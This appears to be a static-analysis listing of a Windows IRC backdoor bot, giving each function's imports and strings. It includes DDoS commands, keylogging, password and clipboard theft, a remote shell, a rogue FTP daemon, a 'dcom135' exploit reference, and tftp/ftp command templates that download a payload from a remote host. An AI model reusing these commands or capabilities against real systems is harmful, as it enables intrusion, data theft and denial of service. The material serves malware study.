sub_outside():
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
KERNEL32.Sleep
WS2_32.gethostbyname
WS2_32.shutdown
KERNEL32.GetTickCount
KERNEL32.GetComputerNameA
KERNEL32.GetLocaleInfoA
KERNEL32.GetVersionExA
KERNEL32.GetVersion
KERNEL32.GetCommandLineA
KERNEL32.GetStartupInfoA
|
sub_40D3A5(0268):
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.Sleep
KERNEL32.GetSystemDirectoryA
KERNEL32.CreateProcessA
KERNEL32.GetProcessHeap
|
sub_40AA35(03c8):
NTDLL.RtlGetLastWin32Error
KERNEL32.FormatMessageA
"%s Error: %s <%d>."
|
sub_40DF4E(0456):
"Account: %S"
"Full Name: %S"
"User Comment: %S"
"Comment: %S"
"Unknown"
"Administrator"
"User"
"Guest"
"Privilege Level: %s"
"Auth Flags: %d"
"Home Directory: %S"
"Parameters: %S"
"Password Age: %d"
"Bad Password Count: %d"
"Number of Logins: %d"
"Last Logon: %d"
"Last Logoff: %d"
"Logon Server: %S"
"Country Code: %d"
"User's Language: %d"
"Max. Storage: %d"
|
sub_40B721(04c3):
KERNEL32.GetTickCount
"%dd %dh %dm"
|
sub_415E37(04fb):
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
WS2_32.htonl
|
sub_40BC4B(0643):
WININET.InternetCrackUrlA
WININET.InternetConnectA
WININET.HttpOpenRequestA
WININET.HttpSendRequestA
WININET.InternetCloseHandle
KERNEL32.ExitThread
|
sub_41EB6C(06bc):
KERNEL32.GetCPInfo
|
sub_41ACE4(0a41):
KERNEL32.HeapCreate
KERNEL32.HeapDestroy
|
sub_40D9B3(0b6c):
ADVAPI32.OpenSCManagerA
ADVAPI32.EnumServicesStatusA
NTDLL.RtlGetLastWin32Error
ADVAPI32.CloseServiceHandle
"The following Windows services are regi"...
" Unknown"
" Paused"
" Pausing"
" Continuing"
" Running"
" Stoping"
" Starting"
" Stopped"
"%s: %s (%s)"
|
sub_40B8D8(0c5f):
KERNEL32.GetVersionExA
ADVAPI32.GetUserNameA
WS2_32.inet_addr
WS2_32.gethostbyaddr
KERNEL32.GetSystemDirectoryA
KERNEL32.GetDateFormatA
KERNEL32.GetTimeFormatA
KERNEL32.GlobalMemoryStatus
"95"
"NT"
"98"
"ME"
"2K"
"XP"
"2003"
"couldn't resolve host"
"dd:MMM:yyyy"
"HH:mm:ss"
"[SYSINFO]: [CPU]: %I64uMHz. [RAM]: %sKB"...
|
sub_42105F(0e35):
KERNEL32.WideCharToMultiByte
"user32.dll"
"MessageBoxA"
"GetActiveWindow"
"GetLastActivePopup"
|
sub_404F9A(0ff5):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_404E54(0ff5):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
"cmd /c echo open %s %d >> ii &echo user"...
|
sub_4030E8(10b8):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"tftp -i %s get %s\r\n"
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_405144(111a):
WS2_32.inet_addr
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.recv
WS2_32.send
KERNEL32.Sleep
WS2_32.closesocket
"echo open %s %d > o&echo user 1 1 >> o "...
|
sub_4D9AB0(1120):
"The dynamic link library '%s' could not"...
"EXECUTABLE"
|
sub_4023A7(11d7):
USER32.GetForegroundWindow
USER32.GetWindowTextA
KERNEL32.Sleep
USER32.GetKeyState
USER32.GetAsyncKeyState
KERNEL32.ExitThread
"%s (Changed Windows: %s)"
"b"
"%s (Buffer full) (%s)"
"%s (Return) (%s)"
|
sub_41533B(12e2):
KERNEL32.ExitThread
|
sub_4D9DC0(13bd):
"EXECUTABLE"
"imm32.dll"
"imm32.dll"
|
sub_4085B3(1772):
GDI32.CreateDCA
GDI32.GetDeviceCaps
GDI32.CreateCompatibleDC
GDI32.CreateDIBSection
GDI32.SelectObject
GDI32.BitBlt
GDI32.GetDIBColorTable
KERNEL32.WriteFile
GDI32.DeleteObject
GDI32.DeleteDC
"DISPLAY"
|
sub_41F240(18d1):
"C:\\m_unpacker\\packed.exe"
|
sub_40C512(1c45):
WS2_32.socket
WS2_32.htons
WS2_32.bind
WS2_32.getsockname
WS2_32.listen
WS2_32.inet_addr
WS2_32.htonl
WS2_32.select
WS2_32.accept
WS2_32.closesocket
WS2_32.send
WS2_32.recv
WS2_32.inet_ntoa
KERNEL32.ExitThread
|
sub_401000(1c83):
KERNEL32.GetTickCount
KERNEL32.ExitThread
|
sub_415419(1e2b):
KERNEL32.OpenProcess
KERNEL32.TerminateProcess
|
sub_40B417(21b8):
KERNEL32.PeekNamedPipe
KERNEL32.GetExitCodeProcess
KERNEL32.Sleep
KERNEL32.ExitThread
|
sub_40762E(22a3):
"%d.%d.%d.%d"
|
sub_41D5A8(22de):
NTDLL.RtlSizeHeap
|
sub_40494F(2383):
KERNEL32.WriteFile
KERNEL32.CreateEventA
NTDLL.RtlGetLastWin32Error
KERNEL32.WaitForSingleObject
KERNEL32.GetTickCount
"."
"\\\\%s\\pipe\\browser"
|
sub_40D4C5(24da):
WS2_32.inet_addr
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
|
sub_4071DB(28ed):
WS2_32.inet_ntoa
|
sub_40966F(2950):
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
NTDLL.RtlFreeHeap
|
sub_4087EE(2bb5):
USER32.IsWindow
USER32.SendMessageA
USER32.DestroyWindow
"Window"
|
sub_41EFAB(2f2e):
KERNEL32.UnhandledExceptionFilter
|
sub_415D6A(2fa7):
WS2_32.htons
WS2_32.socket
WS2_32.connect
WS2_32.inet_ntoa
WS2_32.closesocket
|
sub_40C259(3339):
"rb"
|
sub_42094E(33c3):
KERNEL32.GetTimeZoneInformation
KERNEL32.WideCharToMultiByte
"TZ"
|
sub_4186B1(33da):
KERNEL32.GetLocalTime
KERNEL32.GetSystemTime
KERNEL32.GetTimeZoneInformation
|
sub_409539(3459):
KERNEL32.OpenProcess
KERNEL32.GetSystemInfo
KERNEL32.VirtualQueryEx
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
KERNEL32.ReadProcessMemory
NTDLL.RtlFreeHeap
|
sub_407767(35fb):
KERNEL32.GetTickCount
WS2_32.inet_ntoa
NTDLL.RtlEnterCriticalSection
NTDLL.RtlLeaveCriticalSection
KERNEL32.Sleep
KERNEL32.ExitThread
"dcom135"
|
sub_4084B3(3672):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
WS2_32.send
|
sub_40AAFA(36e0):
USER32.FindWindowA
USER32.SendMessageA
"mIRC"
|
sub_422F03(37c4):
KERNEL32.GetStringTypeW
KERNEL32.GetStringTypeA
KERNEL32.WideCharToMultiByte
|
sub_4D653F(3a62):
"\\\\?\\"
|
sub_4075E6(3b1d):
WS2_32.htonl
|
sub_409392(3b79):
KERNEL32.OpenProcess
KERNEL32.GetSystemInfo
KERNEL32.GetProcessHeap
NTDLL.RtlAllocateHeap
KERNEL32.ReadProcessMemory
KERNEL32.VirtualQueryEx
KERNEL32.FileTimeToLocalFileTime
KERNEL32.FileTimeToSystemTime
NTDLL.RtlFreeHeap
|
sub_40AC42(3cc3):
KERNEL32.GetTempPathA
KERNEL32.WriteFile
KERNEL32.SetFileAttributesA
KERNEL32.ExpandEnvironmentStringsA
KERNEL32.CreateProcessA
"%sdel.bat"
"@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
"%%comspec%% /c %s %s"
|
sub_40AB7C(3f4b):
KERNEL32.GetProcessHeap
KERNEL32.GetFileTime
KERNEL32.ReadProcessMemory
KERNEL32.SetFileTime
"explorer.exe"
|
sub_41FE6F(3fbc):
KERNEL32.FlushFileBuffers
NTDLL.RtlGetLastWin32Error
|
sub_407F4D(3fdf):
WS2_32.recv
WS2_32.send
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_40DCE6(3fe3):
ADVAPI32.IsValidSecurityDescriptor
"Share name: Resource: "...
"Yes"
"No"
"%-14S %-24S %-6u %-4s"
|
sub_404861(4089):
KERNEL32.WriteFile
|
sub_402B84(40e5):
"FXNBFXFXNBFXFXFXFX"
|
sub_408C26(442b):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegQueryValueExA
ADVAPI32.RegCloseKey
"%s\\%s"
"r"
"="
"="
|
sub_416717(4448):
KERNEL32.CreatePipe
NTDLL.RtlGetLastWin32Error
KERNEL32.TerminateThread
|
sub_4168E9(4559):
KERNEL32.CreatePipe
WS2_32.send
NTDLL.RtlGetLastWin32Error
|
sub_41AB9C(45c9):
KERNEL32.GetVersionExA
KERNEL32.GetEnvironmentVariableA
"__MSVCRT_HEAP_SELECT"
"__GLOBAL_HEAP_SELECTED"
|
sub_41C846(4634):
"KERNEL32"
"IsProcessorFeaturePresent"
|
sub_41FDB8(4712):
KERNEL32.SetStdHandle
|
sub_40C1AE(4800):
ADVAPI32.RegCreateKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegDeleteValueA
ADVAPI32.RegCloseKey
|
sub_41699B(4e7e):
WS2_32.recv
KERNEL32.GenerateConsoleCtrlEvent
WS2_32.send
KERNEL32.WriteFile
|
sub_41C96D(502f):
"e+000"
|
sub_407252(51a0):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
|
sub_41FD41(545a):
KERNEL32.SetStdHandle
|
sub_41E709(547a):
KERNEL32.LCMapStringW
KERNEL32.LCMapStringA
KERNEL32.MultiByteToWideChar
KERNEL32.WideCharToMultiByte
|
sub_40B78A(5572):
KERNEL32.GetVersionExA
|
sub_416E97(5581):
KERNEL32.TerminateThread
WS2_32.closesocket
|
sub_40D12A(5886):
"%sKB"
"failed"
|
sub_41BB80(58ed):
KERNEL32.VirtualAlloc
|
sub_4060D0(5a99):
WS2_32.closesocket
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
"\\%s"
"%s"
"%s%s"
"\n"
"*"
|
sub_40D0E2(5b85):
KERNEL32.GetDiskFreeSpaceExA
|
sub_4041D4(5f99):
WS2_32.send
"GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
|
sub_4010B5(5fa9):
WS2_32.WSAStartup
WS2_32.WSASocketA
WS2_32.setsockopt
WS2_32.htons
WS2_32.htonl
KERNEL32.QueryPerformanceFrequency
KERNEL32.QueryPerformanceCounter
WS2_32.sendto
WS2_32.WSAGetLastError
WS2_32.closesocket
WS2_32.WSACleanup
"ddos.syn"
"ddos.ack"
"ddos.random"
|
sub_422863(5fbb):
"invalid string position"
|
sub_41944F(6050):
NTDLL.RtlAllocateHeap
NTDLL.RtlReAllocateHeap
|
sub_41E517(6091):
NTDLL.RtlGetLastWin32Error
|
sub_40B358(62d2):
KERNEL32.WriteFile
|
sub_4219A9(6338):
"1#SNAN"
"1#IND"
"1#INF"
"1#QNAN"
|
sub_40D835(6353):
"The specified service name is invalid."
"The requested control code is undefined"...
"The handle is invalid."
"The handle does not have the required a"...
"The service binary file could not be fo"...
"The service cannot be stopped because o"...
"The database is locked."
"A thread could not be created for the s"...
"The process for the service was started"...
"The requested control code is not valid"...
"An instance of the service is already r"...
"The system is shutting down."
"An unknown error occurred: <%ld>"
|
sub_41B497(64eb):
KERNEL32.VirtualAlloc
|
sub_41FAFB(66df):
KERNEL32.WideCharToMultiByte
|
sub_407BDE(6a52):
WS2_32.htons
WS2_32.socket
WS2_32.WSAAsyncSelect
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_417C3B(6c37):
NTDLL.RtlFreeHeap
|
sub_4053D5(6d67):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.setsockopt
WS2_32.ioctlsocket
WS2_32.htons
WS2_32.bind
WS2_32.listen
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.send
WS2_32.recv
WS2_32.closesocket
"220 NzmxFtpd 0wns j0\n"
"%s %s"
"USER"
"331 Password required\n"
"PASS"
"230 User logged in.\n"
"SYST"
"215 NzmxFtpd\n"
"REST"
"350 Restarting.\n"
"257 \"/\" is current directory.\n"
"TYPE"
"A"
"200 Type set to A.\n"
"TYPE"
"I"
"200 Type set to I.\n"
"PASV"
"425 Passive not supported on this serve"...
"LIST"
"226 Transfer complete\n"
"PORT"
"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
"%x%x\n"
"%s.%s.%s.%s"
"200 PORT command successful.\n"
"RETR"
"150 Opening BINARY mode data connection"...
"226 Transfer complete.\n"
"425 Can't open data connection.\n"
"QUIT"
"221 Goodbye happy r00ting.\n"
|
sub_416810(6ddc):
KERNEL32.GetCurrentProcess
KERNEL32.DuplicateHandle
KERNEL32.CreateProcessA
NTDLL.RtlGetLastWin32Error
"cmd /q"
|
sub_406C19(6e25):
WS2_32.socket
KERNEL32.Sleep
WS2_32.WSAGetLastError
KERNEL32.ExitThread
WS2_32.htons
WS2_32.bind
WS2_32.select
WS2_32.recvfrom
WS2_32.inet_ntoa
WS2_32.sendto
WS2_32.closesocket
"octet"
"rb"
|
sub_403DF6(6e81):
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.recv
|
sub_4089E7(6f62):
USER32.IsWindow
USER32.SendMessageA
USER32.DestroyWindow
"Window"
|
sub_405AF2(70a6):
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.ioctlsocket
WS2_32.select
WS2_32.__WSAFDIsSet
WS2_32.accept
WS2_32.recv
WS2_32.closesocket
WS2_32.WSAGetLastError
KERNEL32.ExitThread
"GET "
" "
"\r\n"
|
sub_415C5E(71f8):
KERNEL32.GetTickCount
USER32.FindWindowA
"mIRC"
|
sub_40144A(7247):
WS2_32.socket
WS2_32.WSAGetLastError
KERNEL32.ExitThread
WS2_32.setsockopt
WS2_32.inet_addr
WS2_32.htons
KERNEL32.GetTickCount
WS2_32.sendto
WS2_32.closesocket
|
sub_409037(727f):
KERNEL32.Sleep
KERNEL32.GetEnvironmentVariableW
KERNEL32.ExitThread
"SeDebugPrivilege"
"NTDLL.DLL"
"NtQuerySystemInformation"
"RtlCreateQueryDebugBuffer"
"RtlQueryProcessDebugInformation"
"RtlDestroyQueryDebugBuffer"
"RtlRunDecodeUnicodeString"
"USERNAME"
"USERDOMAIN"
"SeDebugPrivilege"
|
sub_417BC7(7566):
NTDLL.RtlAllocateHeap
|
sub_4DC494(75a3):
"MBX@%X@*.###"
"kernel32.dll"
"GetTempPathA"
"SetCurrentDirectoryA"
"GetCurrentDirectoryA"
"FindFirstFileA"
"DeleteFileA"
"FindClose"
"GetExitCodeProcess"
"WaitForSingleObject"
"ExitProcess"
"OpenProcess"
"Sleep"
"CloseHandle"
|
sub_4D13F3(7689):
"_splashscreen.bmp"
|
sub_407D66(78f3):
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.gethostbyaddr
WS2_32.connect
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
WS2_32.recv
WS2_32.send
NTDLL.RtlGetLastWin32Error
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_40B328(7918):
KERNEL32.GetProcessHeap
|
sub_4165C6(7989):
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
KERNEL32.TerminateThread
KERNEL32.WaitForMultipleObjects
KERNEL32.TerminateProcess
WS2_32.closesocket
|
sub_401D82(7b89):
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.WSAGetLastError
KERNEL32.ExitThread
WS2_32.setsockopt
WS2_32.inet_addr
WS2_32.htons
WS2_32.htonl
WS2_32.sendto
WS2_32.closesocket
"syn"
"ack"
"random"
|
sub_4D2DD0(7dab):
"kernel32.dll"
|
sub_4159F4(7e76):
KERNEL32.GetTickCount
|
sub_4221EA(8107):
KERNEL32.CompareStringW
KERNEL32.CompareStringA
KERNEL32.GetCPInfo
KERNEL32.MultiByteToWideChar
|
sub_41FB63(81be):
KERNEL32.GetStringTypeW
KERNEL32.GetStringTypeA
KERNEL32.MultiByteToWideChar
|
sub_4029E9(840c):
KERNEL32.MultiByteToWideChar
"\\\\"
|
sub_40C2CB(8474):
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.gethostbyname
WS2_32.connect
WS2_32.closesocket
|
sub_41A6B7(84ec):
NTDLL.RtlGetLastWin32Error
|
sub_41AD41(8555):
NTDLL.RtlAllocateHeap
|
sub_40B112(862d):
KERNEL32.GetTickCount
WS2_32.socket
WS2_32.inet_addr
WS2_32.gethostbyname
KERNEL32.ExitThread
WS2_32.htons
WS2_32.sendto
KERNEL32.Sleep
|
sub_40B56C(86d3):
KERNEL32.CreatePipe
KERNEL32.GetCurrentProcess
KERNEL32.DuplicateHandle
KERNEL32.CreateProcessA
KERNEL32.CreateThread
NTDLL.RtlGetLastWin32Error
"cmd.exe"
|
sub_416FEA(8732):
"%s: %s stopped. (%d thread(s) stopped.)"...
"%s: No %s thread found."
|
sub_41ADB4(87ad):
KERNEL32.VirtualFree
NTDLL.RtlFreeHeap
|
sub_415F28(8931):
KERNEL32.ExitThread
|
sub_4162AC(89be):
ADVAPI32.RegOpenKeyExA
ADVAPI32.RegSetValueExA
ADVAPI32.RegCloseKey
KERNEL32.GetLogicalDrives
KERNEL32.GetDriveTypeA
"Software\\Microsoft\\OLE"
"EnableDCOM"
"SYSTEM\\CurrentControlSet\\Control\\Lsa"
"restrictanonymous"
"%c$"
"%c:\\"
|
sub_40E5EB(8a01):
KERNEL32.GetComputerNameA
|
sub_4181A0(8af0):
NTDLL.RtlUnwind
|
sub_42090A(8bd2):
KERNEL32.IsBadCodePtr
|
sub_4D32E0(8cb2):
"kernel32.dll"
"CloseHandle"
"CreateFileA"
"CreateFileW"
"CreateFileMappingA"
"CreateFileMappingW"
"CreateProcessA"
"DebugBreak"
"DeleteFileA"
"EnterCriticalSection"
"ExitProcess"
"FindClose"
"FindFirstFileA"
"FlushFileBuffers"
"FormatMessageA"
"FreeLibrary"
"GetCurrentProcess"
"GetCurrentProcessId"
"GetEnvironmentVariableA"
"GetExitCodeProcess"
"GetFileAttributesA"
"GetFileAttributesW"
"GetFileInformationByHandle"
"GetFileSize"
"GetFileTime"
"GetFullPathNameA"
"GetFullPathNameW"
"GetLastError"
"GetModuleFileNameA"
"GetModuleHandleA"
"GetPrivateProfileIntA"
"GetPrivateProfileSectionNamesA"
"GetPrivateProfileStringA"
"GetProcAddress"
"GetSystemTimeAsFileTime"
"GetTempFileNameA"
"GetTempPathA"
"GetTickCount"
"HeapAlloc"
"HeapFree"
"HeapCreate"
"InitializeCriticalSection"
"DeleteCriticalSection"
"LeaveCriticalSection"
"LoadLibraryA"
"LoadLibraryExA"
"LocalAlloc"
"LocalFree"
"LockFile"
"MultiByteToWideChar"
"OpenProcess"
"RaiseException"
"ReadFile"
"SetEnvironmentVariableA"
"SetEvent"
"SetFilePointer"
"SetLastError"
"SetUnhandledExceptionFilter"
"Sleep"
"TerminateProcess"
"UnlockFile"
"UnmapViewOfFile"
"VirtualAlloc"
"VirtualFree"
"VirtualProtect"
"VirtualQuery"
"WaitForSingleObject"
"WideCharToMultiByte"
"WriteFile"
"lstrcmpiA"
"user32.dll"
"ChangeDisplaySettingsA"
"CharUpperBuffA"
"LoadImageA"
"wsprintfA"
"wvsprintfA"
"gdi32.dll"
"AddFontResourceA"
"CreateCompatibleDC"
"CreateDIBSection"
"DeleteDC"
"RemoveFontResourceA"
"BeginPaint"
"EndPaint"
"GetObjectA"
"SelectObject"
"DeleteObject"
"BitBlt"
"GetWindowThreadProcessId"
"SetActiveWindow"
"SetForegroundWindow"
"RegisterClassExA"
"GetSystemMetrics"
"CreateWindowExA"
"GetMessageA"
"TranslateMessage"
"DispatchMessageA"
"DestroyWindow"
"EnumWindows"
"DefWindowProcA"
"PostMessageA"
"CreateThread"
|
sub_40DBB0(8cdb):
KERNEL32.WideCharToMultiByte
|
sub_407FEA(8ce4):
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.closesocket
KERNEL32.ExitThread
|
sub_41FEC6(8dd2):
KERNEL32.GetFileType
NTDLL.RtlGetLastWin32Error
|
sub_40AABF(8e50):
USER32.OpenClipboard
USER32.GetClipboardData
KERNEL32.GlobalLock
KERNEL32.GlobalUnlock
USER32.CloseClipboard
|
sub_40D679(8f00):
WS2_32.send
KERNEL32.Sleep
"NOTICE"
"PRIVMSG"
"%s"
|
sub_402ACC(90cb):
KERNEL32.MultiByteToWideChar
KERNEL32.Sleep
"\\\\"
|
sub_4197F9(91cb):
NTDLL.RtlGetLastWin32Error
|
sub_40AE02(92a8):
IPHLPAPI.GetIpNetTable
IPHLPAPI.DeleteIpNetEntry
|
sub_41ED97(94b9):
KERNEL32.WriteFile
NTDLL.RtlGetLastWin32Error
|
sub_4199B9(95ea):
KERNEL32.MultiByteToWideChar
NTDLL.RtlGetLastWin32Error
|
sub_4059DB(9713):
WS2_32.WSAStartup
WS2_32.socket
WS2_32.inet_addr
WS2_32.htons
WS2_32.connect
WS2_32.closesocket
WS2_32.WSACleanup
|
sub_403E75(981b):
WS2_32.htonl
WS2_32.send
|
sub_40ADF3(983e):
DNSAPI.DnsFlushResolverCache
|
sub_420E98(9a80):
KERNEL32.MultiByteToWideChar
|
sub_40797F(9b43):
WS2_32.inet_addr
NTDLL.RtlDeleteCriticalSection
KERNEL32.InitializeCriticalSectionAndSpinCount
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.inet_ntoa
KERNEL32.ExitThread
|
sub_40EE72(9b7d):
KERNEL32.CreateThread
KERNEL32.Sleep
NTDLL.RtlGetLastWin32Error
WS2_32.WSAStartup
WS2_32.gethostbyname
WS2_32.socket
WS2_32.htons
WS2_32.connect
WS2_32.recv
WS2_32.send
WS2_32.closesocket
WS2_32.WSACleanup
KERNEL32.GetTickCount
WS2_32.getsockname
WS2_32.inet_ntoa
WS2_32.inet_addr
KERNEL32.MoveFileA
KERNEL32.CreateProcessA
KERNEL32.GetTempPathA
KERNEL32.DeleteFileA
WS2_32.gethostbyaddr
KERNEL32.TerminateThread
KERNEL32.GetSystemDirectoryA
DNSAPI.DnsFlushResolverCache
" :"
" "
"!"
"PING"
"PONG %s\r\n"
"JOIN %s %s\r\n"
"001"
"005"
"302"
"@"
"433"
"NICK %s\r\n"
"KICK"
"NOTICE %s :%s\r\n"
"JOIN %s %s\r\n"
"NICK"
":%s%s"
"PART"
"QUIT"
"353"
"PART"
"NOTICE %s :%s\r\n"
"PRIVMSG"
"NOTICE"
"SEND"
"%s"
"%s has just versioned me."
"CHAT"
"%s"
"c"
" :"
"$%d-"
"$%d"
"$me"
"$user"
"$chan"
"$rndnick"
"$server"
"$chr("
")"
"63"
" "
" "
"irc.rndnick"
"rn"
"irc.die"
"irc.di"
"irc.logout"
"lo"
"irc.version"
"ver"
"lockdown.on"
"ld.on"
"lockdown.off"
"ld.off"
"proxy.socks4.on"
"proxy.s4.on"
"proxy.socks4.off"
"Server"
"daemon.rlogin.off"
"Server"
"Server"
"proxy.redirect.off"
"daemon.tftp.off"
"Server"
"util.findfile.off"
"util.ff.off"
"com.ps.off"
"clone.off"
"Clone"
"Secure"
"root.stop"
"Scan"
"Exploitation"
"root.stats"
"root.st"
"irc.r"
"irc.disconnect"
"irc.d"
"irc.quit"
"irc.q"
"irc.status"
"irc.s"
"irc.id"
"irc.i"
"com.rebewt"
"threads.list"
"threads.l"
"irc.aliases"
"irc.al"
"irc.log"
"irc.lg"
"util.clg"
"com.netinfo"
"com.ni"
"com.sysinfo"
"com.si"
"irc.rem0ve"
"irc.rm0"
"com.procs"
"com.ps"
"com.harvest"
"com.key"
"com.uptime"
"com.up"
"com.drv"
"com.testdlls"
"com.dll"
"com.opencmd"
"com.ocmd"
"com.ocmd.off"
"Remote shell"
"[CMD]"
"irc.who"
"-[Login List]-"
""
"%d. %s"
"com.getclip"
"com.gc"
"util.farp"
"util.fdns"
"root.currentip"
"root.cip"
"daemon.rlogin.on"
"daemon.rl.on"
"daemon.httpd.on"
"daemon.tftp.on"
"daemon.tf.on"
"com.findpass"
"com.fp"
"asc"
"sa"
"irc.nick"
"irc.n"
"irc.join"
"irc.j"
"irc.part"
"irc.pt"
"irc.raw"
"irc.ra"
"threads.kill"
"threads.k"
"clone.quit"
"clone.q"
"clone.rn"
"irc.prefix"
"irc.pr"
"com.open"
"com.o"
"irc.setserve"
"irc.se"
"irc.dns"
"irc.dn"
"com.killprocname"
"com.kpn"
"com.prockillid"
"com.pkid"
"com.delete"
"com.del"
"dcc.get"
"dcc.gt"
"com.filelist"
"com.fl"
"irc.visit"
"irc.v"
"mirc.cmd"
"mirc.cmd"
"com.cmd"
"com.cm"
"com.readfile"
"com.rf"
"sniff"
"on"
"#f"
"off"
"com.keylog"
"on"
"file"
"off"
"file"
"#f"
"com.net"
"start"
"stop"
"pause"
"continue"
"delete"
"share"
"user"
"send"
"%s"
"com.capture"
"com.cap"
"irc.gethost"
"irc.gh"
"irc.addalias"
"irc.aa"
"irc.privmsg"
"irc.pm"
"irc.action"
"irc.ac"
"irc.cycle"
"irc.cy"
"irc.mode"
"irc.m"
"clone.raw"
"clone.ra"
"clone.mode"
"clone.m"
"clone.nick"
"clone.ni"
"clone.join"
"clone.j"
"clone.part"
"clone.p"
"irc.repeat"
"irc.rp"
"irc.delay"
"irc.de"
"download.update"
"download.up"
"com.execute"
"com.e"
"findfile"
"ff"
"com.rename"
"com.mv"
"ddos.icmp"
"ddos.ic"
"clone.make"
"clone.start"
"ddos.syn"
"ddos.ack"
"ddos.random"
"ddos.synf"
"download.wg"
"daemon.redirect"
"daemon.rd"
"root.ps"
"clone.pm"
"clone.action"
"clone.ac"
"advscan"
"adv"
"ddos.udpf"
"u"
"ddos.pingflood"
"ddos.pingf"
"p"
"ddos.tcpf"
"util.email"
" "
"_"
"helo $rndnick\nmail from: <%s>\nrcpt to: "...
"util.httpcon"
"util.hcon"
"ftp.upload"
"%s\\%i%i%i.dll"
"ab"
"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
"-s:%s"
"ftp.exe"
"open"
"syn"
"ack"
"random"
"Spoofed"
"Normal"
"ICMP.dll not available"
"#f"
"Sequential"
"[%s] * %s %s"
"[%s] <%s> %s"
"botid"
"%s%s.exe"
"repeat"
"MODE %s\r\n"
"JOIN %s %s\r\n"
"screen"
"drivers"
"frame"
"video"
"r"
"\n"
"%s"
"open"
"QUIT :later\r\n"
"all"
"JOIN %s %s\r\n"
"NICK %s\r\n"
"#f"
"#f"
"Sequential"
"full"
"%s"
"botid"
"QUIT :%s\r\n"
"QUIT :later\r\n"
"QUIT :disconnecting\r\n"
"QUIT :reconnecting\r\n"
"secure"
"sec"
"Unsecuring"
"ABOSAL7 tool"
"NICK %s\r\n"
"!"
"~"
"cool"
"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
"NOTICE %s :You've been logged.\r\n"
"NOTICE %s :Nice try, idiot. (%s!%s).\r\n"
"NOTICE %s :You've been logged.\r\n"
"cool"
"USERHOST %s\r\n"
"+xi"
"MODE %s %s\r\n"
"JOIN %s %s\r\n"
|
sub_40E4B7(9bb4):
"Invalid parameter."
"Server name not found."
"This network request is not supported."
"Not enough memory."
"The name is invalid."
"Duplicate share name."
"Invalid for redirected resource."
"Device or directory does not exist."
"Level parameter is invalid."
"A general failure occurred in the netwo"...
"The operation is allowed only on the pr"...
"The user account already exists."
"The group already exists."
"The password is shorter than required ("...
"An unknown error occurred."
"The computer name is invalid."
"Share not found."
"The user name could not be found."
"Network connection not found."
|
sub_416E19(9c71):
"-[Thread List]-"
"%d. %s"
|
sub_40AC20(9dbe):
USER32.ExitWindowsEx
"SeShutdownPrivilege"
|
sub_4208D2(9ed0):
KERNEL32.IsBadReadPtr
|
sub_4208EE(9ed0):
KERNEL32.IsBadWritePtr
|
sub_403F94(a2f7):
WS2_32.send
|
sub_402688(a2fd):
WS2_32.htons
WS2_32.inet_addr
WS2_32.socket
WS2_32.WSAGetLastError
KERNEL32.ExitThread
WS2_32.bind
WS2_32.closesocket
WS2_32.WSAIoctl
WS2_32.recv
WS2_32.inet_ntoa
"[PSNIFF]"
|
sub_402DD7(a370):
KERNEL32.TransactNamedPipe
KERNEL32.WriteFile
WS2_32.socket
WS2_32.htons
WS2_32.inet_addr
WS2_32.connect
WS2_32.send
WS2_32.recv
WS2_32.closesocket
KERNEL32.Sleep
|
sub_41570E(a3e1):
WS2_32.WSAStartup
KERNEL32.ExitThread
KERNEL32.SetConsoleCtrlHandler
NTDLL.RtlGetLastWin32Error
WS2_32.WSACleanup
WS2_32.htons
WS2_32.socket
WS2_32.bind
WS2_32.listen
WS2_32.accept
WS2_32.setsockopt
WS2_32.inet_ntoa
KERNEL32.CreateThread
KERNEL32.Sleep
WS2_32.WSAGetLastError
WS2_32.closesocket
|
sub_4076CA(a6ca):
WS2_32.socket
